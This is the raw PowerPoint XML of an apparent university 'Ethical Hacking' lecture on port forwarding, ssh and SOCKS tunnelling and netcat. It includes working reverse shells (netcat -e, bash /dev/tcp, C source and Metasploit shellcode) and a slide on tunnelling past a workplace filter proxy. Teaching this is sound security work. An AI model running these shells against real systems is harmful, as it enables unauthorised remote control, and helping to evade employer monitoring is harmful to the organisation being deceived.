              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2898033" y="3481312"/>
                <a:ext cx="3240720" cy="11390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B47A2FD-16E2-5741-93CB-D661E1318E3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889393" y="3472312"/>
                  <a:ext cx="3258360" cy="1156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31346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Forwarding with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iptables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Probably the simplest way to port forward without a tunnel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 not going over a different protocol like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Done in the kernel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sysctl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net.ipv4.conf.eth0.forwarding=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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iptables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-t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nat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-A PREROUTING -p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tcp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eth0 --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dport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1234 -j DNAT --to-destination 12.34.56.78:1111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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iptables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-t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nat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-A POSTROUTING -o eth0 -j MASQUERADE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routers support forwarding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="PortForward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9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Days of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Where are we?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bind Shell – Remote shell listening on port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vvl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-p 8888 -e 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Firewalls often cause problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Private IPs mean you can’t reach the port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Shell – We listen from a public IP we own, then connect to our open port from shelled machine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our.machine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8888 -e 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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with -e or -c option (not always around)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Nice site to help beginners</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="portforward.co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76400"/>
            <a:ext cx="6400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53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My company is spying on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Suppose at work I have to direct my browser to a proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filter proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” that limits my traffic and watches what I do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I don’t like this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I want to go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> without being watched</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> out to myhouse.com like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>work$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–L 8888:example.com:80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myhouse.com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900" dirty="0"/>
              <a:t>Note: I may have to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> on port 80 at home</a:t>
            </a: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then point my browser to localhost:8888</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from work to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>myhouse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; company has NO IDEA where I’m connecting to nor what I’m doing…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SOCKS-based forwarding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92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I really don’t want to have to create a new forwarding command for each new target, right?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Last one was for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, but I may want to surf to other sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOCKS allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> forwarding to various IPs/ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connect to a SOCKS proxy, tell it IP and port, it forwards your connection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–D 8888 jrblack@myhouse.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gives you a local port 8888 such that connecting to it alerts the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (at myhouse.com) to use SOCKS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You point your browser at localhost:8888 and tell it to use SOCKS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has to know how to speak SOCKS, unlike other forwarding examples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browsers/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OSes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> support SOCKS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://sockslist.net/images/ie-socks-config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905000"/>
            <a:ext cx="4267200" cy="45804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en-US" dirty="0" err="1"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SOCKS proxies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HTTP proxy looks for HTTP CONNECT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CONNECT tells proxy where the client wants to go</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>CONNECT example.host.com:22 HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Proxy-Authorization: Basic encoded-credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then all packets relaying for the duration of the connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Above we are “tunneling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> over http”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For SOCKS there is no interpretation of commands to the proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You request a connection to a port and it forwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can even do UDP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05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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Trickery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Port forwarding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>moxie$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–l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8888 –c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www.google.com 80'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(This doesn’t work very well)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We’ll do more robust forwarding soon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What about connecting two private IPs together… how would you?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use moxie as proxy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nc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-l –p 8888 -c ‘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nc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-l -p 9999’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Shell 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Penetrated machine on private network, you want control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bind shell won’t fly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, you’re done (use -e /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh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you have a an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> acct, forward a port out (not likely; we’ll see why in a few minutes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you can inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> commands and bash sockets are supported</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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$ exec 5&lt;&gt;/dev/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tcp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/moxie/8888</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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$ cat &lt;&amp; 5 | while read line; do $line 2&gt;&amp; 5 &gt;&amp; 5; done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None of these works?!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you have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/python available, you can get a reverse shell in those languages (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lmgtfy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you have C compiler, you can get a reverse shell in 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Shell in C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219200"/>
            <a:ext cx="8153400" cy="58674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#include &lt;sys/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socket.h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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netinet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>in.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    char *shell[2];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soc, remote;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sockaddr_in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>serv_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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serv_addr.sin_family</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=2;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serv_addr.sin_addr.s_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=0x78c98a80;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serv_addr.sin_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(8888);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    soc = socket(2,1,0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    remote = connect(soc, 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sockaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>*)&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>serv_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 0x10);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    dup2(soc, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    dup2(soc, 1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    dup2(soc, 2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    shell[0] = "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    shell[1] = 0;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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(shell[0], shell, 0);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Custom-built </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> Reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>Shellcode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600" dirty="0"/>
              <a:t>Built for x86, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>, hardcoded to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>, port 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>(Also in the book, though they get some details wrong)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>Shellcoders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> see any issues?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unsigned char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[] =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"\x31\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\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\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xcd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\x80"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"\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10"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"\x51\x50\x89\xe1\x43\x6a\x66\x58\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xcd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\x80\x59\x87\xd9\xb0\x3f"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"\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xcd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\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"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"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\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xcd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\x80\x31\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\x6a\x01"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"\x58\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xcd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\x80";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main() { ((void(*)())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)(); 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words on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit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Custom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (shells, bind shells, reverse shells, staged shells, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tons of encoders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Support for a lot of platforms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Huge exploit database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Already on Kali for your hacking pleasure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32796</TotalTime>
  <Words>2199</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>228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Aharoni</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Median</vt:lpstr>
      <vt:lpstr>Ethical Hacking – Lecture 4</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Two Days of Hands-On</vt:lpstr>
      <vt:lpstr>Other nc Trickery</vt:lpstr>
      <vt:lpstr>Reverse Shell wrap-up</vt:lpstr>
      <vt:lpstr>None of these works?!</vt:lpstr>
      <vt:lpstr>Reverse Shell in C</vt:lpstr>
      <vt:lpstr>Custom-built Metasploit Reverse Shellcode</vt:lpstr>
      <vt:lpstr>A few words on Metasploit</vt:lpstr>
      <vt:lpstr>Crash Course in Cryptography</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Symmetric vs Asymmetric</vt:lpstr>
      <vt:lpstr>Hash Functions</vt:lpstr>
      <vt:lpstr>Birthday Attacks on Hash Functions</vt:lpstr>
      <vt:lpstr>Sayler Hashing</vt:lpstr>
      <vt:lpstr>Hash Function Applications</vt:lpstr>
      <vt:lpstr>Psst, Buddy, Wanna see my Private Key? </vt:lpstr>
      <vt:lpstr>Speaking of SSH…</vt:lpstr>
      <vt:lpstr>SSH protocol (oversimplified)</vt:lpstr>
      <vt:lpstr>Password-Based Authentication</vt:lpstr>
      <vt:lpstr>Public-Key SSH Auth</vt:lpstr>
      <vt:lpstr>Port-Forwarding (Tunneling) with ssh</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Example: Exposing my Kali web server</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Port Forwarding with iptables</vt:lpstr>
      <vt:lpstr>Most routers support forwarding</vt:lpstr>
      <vt:lpstr>Nice site to help beginners</vt:lpstr>
      <vt:lpstr>Example: My company is spying on me</vt:lpstr>
      <vt:lpstr>SOCKS-based forwarding</vt:lpstr>
      <vt:lpstr>All browsers/OSes support SOCKS</vt:lpstr>
      <vt:lpstr>HTTP vs SOCKS proxies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hacking 101</dc:title>
  <dc:creator>John</dc:creator>
  <cp:lastModifiedBy>John Black</cp:lastModifiedBy>
  <cp:revision>371</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-26T17:09:19Z</dcterms:modified>
</cp:coreProperties>
</file>